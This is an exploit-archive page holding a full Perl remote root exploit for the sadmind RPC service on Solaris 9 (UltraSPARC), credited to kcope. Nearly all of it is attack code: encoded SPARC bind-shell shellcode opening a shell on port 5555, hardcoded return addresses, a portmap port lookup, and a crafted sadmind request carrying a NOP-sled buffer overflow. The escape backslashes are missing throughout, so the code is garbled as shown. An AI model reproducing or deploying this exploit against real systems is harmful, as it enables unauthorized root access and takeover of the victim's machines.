[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
# Published : 2008-10-19
# Author : kcope
# Previous Title : Dart Communications PowerTCP FTP module Remote BOF Exploit
# Next Title : Hummingbird Deployment Wizard 2008 ActiveX Command Execution
#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of work was shamelessy ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [kcope2@googlemail.com] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
###################################################################################
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
print "holygrail2 vs. SunOS 5.9 sadmindnby kcope in 2008nbinds a shell to port 5555n";
my $host = $ARGV[0];
if ($host eq "") {
print "usage: perl holygrail2.pl <address>n";
exit(-1);
}
# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
my $payload =
"x23x32xdexd7xa2x14x62x6fx20xbfxffxffx20xbfxffxff".
"x7fxffxffxffxeax03xe0x20xaax9dx40x11xeax23xe0x20".
"xa2x04x40x15x81xdbxe0x20x12xbfxffxfbx9ex03xe0x04".
"x57x50xfex68xffxb6xdex77x69xadxdex7cx01xcbx1ex89".
"xbbxfcxbex8fx2bxecx9ex8dxcex1cxfex77x5fxccxdfx7f".
"x8fxcexa0x87x11x10xdfxf2xf1x04xfex4fx11x06xbex5f".
"x11x6bx7ex6bx03x4fx21x83xb7x80x01xb3x35xb0x61x5b".
"xa8x60x42x93x1bx83x3dx5bx09x94x62x9axafx84x42x75".
"x3ex74xa3x8dx91x77x1cx75x83x62x23x8cx37x80xe3x87".
"xb5xb4xc3x7dx28x65x24x89x9bxa6x9bx71x8fxb8xc4x82".
"x3dxa9x24x8dxd5x6bx84x8cx54x7bxe4xb0xc9xabxc4xc4".
"xf8xf3xfbx28x2dx0fxbbx28x59x15x04xc3x40x21x5cx49".
"x22x22x7cx03x01x41xa2x01xd5x75xfbxa5x47x5ax5bxcd".
"x87xa6x24x3dx97xfaxe4x45xd7xdexa4x49x5ax30xfbx8a".
"xcbxe0xdbxe4xecx01x1bxf4";
my $patchaddr = pack("N", 0xffbf83d8);
my $retaddr = pack("N", 0xffbf88e0);
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"x00x00x00x00". # Call
"x00x00x00x02". # RPC Version
"x00x01x86xa0". # Program Number (PORTMAP)
"x00x00x00x02". # Program Version (2)
"x00x00x00x03". # Procedure (getport)
("x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s)
{
print "nError: could not create socket to target: $!n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_sadmin_expl {
my ($hostname, $command, $first) = @_;
my $packed_host = $hostname . ("x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"x00x00x00x00". # Call
"x00x00x00x02". # RPC Version
"x00x01x87x88". # Program Number (SADMIND)
"x00x00x00x0a". # Program Version (10)
"x00x00x00x01". # Procedure
"x00x00x00x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"x00x00x00x00". # UID = 0
"x00x00x00x00". # GID = 0
"x00x00x00x00"; # No Extra Groups
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("x00" x 8);
my $fp = pack("N", 0xffbf9108);
my $buf1 = "x90" x (2050-length($payload)-500) . $payload . "x90x90" . "x90" x 500 . "CC" . $fp . $fp . $retaddr x 100;
if ($first eq 1) {
$buf1 = "x90" x 50;
}
while (length($buf1) % 4 != 0) { $buf1 .= "x00" }
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"x00x07x45xdf".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x06".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00x00x00x04".
"x7fx00x00x01". # 127.0.0.1
"x00x01x87x88". # SADMIND
"x00x00x00x0ax00x00x00x04".
"x7fx00x00x01". # 127.0.0.1
"x00x01x87x88". # SADMIND
"x00x00x00x0ax00x00x00x11x00x00x00x1e".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00".
"x00x00x00x3b". $packed_host.
"x00x00x00x00x06" . "system".
"x00x00x00x00x00x15". "../../../../../bin/sh". "x00x00x00";
# Append Body Length ^-- Here
my $body =
"x00x00x00x0e". "ADM_FW_VERSION".
"x00x00x00x00x00x03x00x00x00x04x00x00".
"x00x01x00x00x00x00x00x00x00x00".
"x00x00x00x08". "ADM_LANG".
"x00x00x00x09x00x00x00x02x00x00".
"x00x01". "C" .
"x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x0d". "ADM_REQUESTID".
"x00x00x00x00x00x00x09x00x00x00x12x00x00x00x11".
"00009:000000000:0"."x00x00x00".
"x00x00x00x00x00x00x00x00".
"x00x00x00x09". "ADM_CLASS".
"x00x00x00x00x00x00x09x00x00x00x07".
"x00x00x00x06" . "system" .
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x0e" . "ADM_CLASS_VERS" .
"x00x00x00x00x00x09x00x00x00x04".
"x00x00x00x03". "2.1".
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x0a" . "ADM_METHOD" .
"x00x00x00x00x00x09" . pack("N", length($buf1)+1) . pack("N", length($buf1)) . $buf1 .
"x00x00x00x00x00x00x00x00".
"x00x00x00x08". "ADM_HOST" .
"x00x00x00x09x00x00x00x3cx00x00x00x3b".
$packed_host.
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x0f". "ADM_CLIENT_HOST".
"x00x00x00x00x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"x00x00x00x00". "x00x00x00x00".
"x00x00x00x11" . "ADM_CLIENT_DOMAIN".
"x00x00x00x00x00x00x09x00x00x00x01x00x00x00x00x00x00".
"x00x00x00x00x00x00".
"x00x00x00x11" . "ADM_TIMEOUT_PARMS".
"x00x00x00x00x00".
"x00x09x00x00x00x1c".
"x00x00x00x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x09" . "ADM_FENCE" .
"x00x00x00x00x00x00x09x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x01x58x00x00x00x00x00x00x09x00".
"x00x00x03x00x00x00x02" . "-c" .
"x00x00x00x00x00x00x00x00x00x00x00x00x00x01x59x00".
"x00x00x00x00x00x09x00x00x02x01x00x00x02x00".
$command . ("x00" x (512 - length($command))).
"x00x00x00x00x00x00x00x00x00x00x00x10".
"netmgt_endofargs";
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
$|=1;
my $portmap = "111";
for (my $i=1;$i<3;$i++) {
my $target_port = rpc_getport($host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmindn";
exit(0);
}
my $s = rpc_socket($host, $target_port);
my $x = rpc_sadmin_expl("localhost", "foo", $i);
print $s $x;
my $r = rpc_read($s);
close ($s);
}
# www.Syue.com [2008-10-19]